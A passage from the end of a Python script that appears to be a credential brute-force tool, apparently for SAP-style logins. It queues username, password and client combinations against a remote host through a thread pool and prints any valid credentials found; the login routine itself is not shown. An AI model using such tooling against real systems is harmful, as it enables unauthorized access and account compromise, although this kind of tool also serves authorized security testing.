            print("[*] Adding testcase for username %s with password %s on client %s" % (username, password, client))
        pool.add_task(login, options.remote_host, options.remote_port,
                      options.terminal, options.route_string, username,
                      password, client, options.verbose, results)

    pool.wait_completion()

    # Print the credentials found
    for (success, status, username, password, client) in results:
        if success:
            print("[+] Valid credentials found: \tClient: %s\tUsername: %s\tPassword: %s\tStatus: %s" % (client, username, password, status))


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("[*] Canceled by the user ...")
        exit(0)
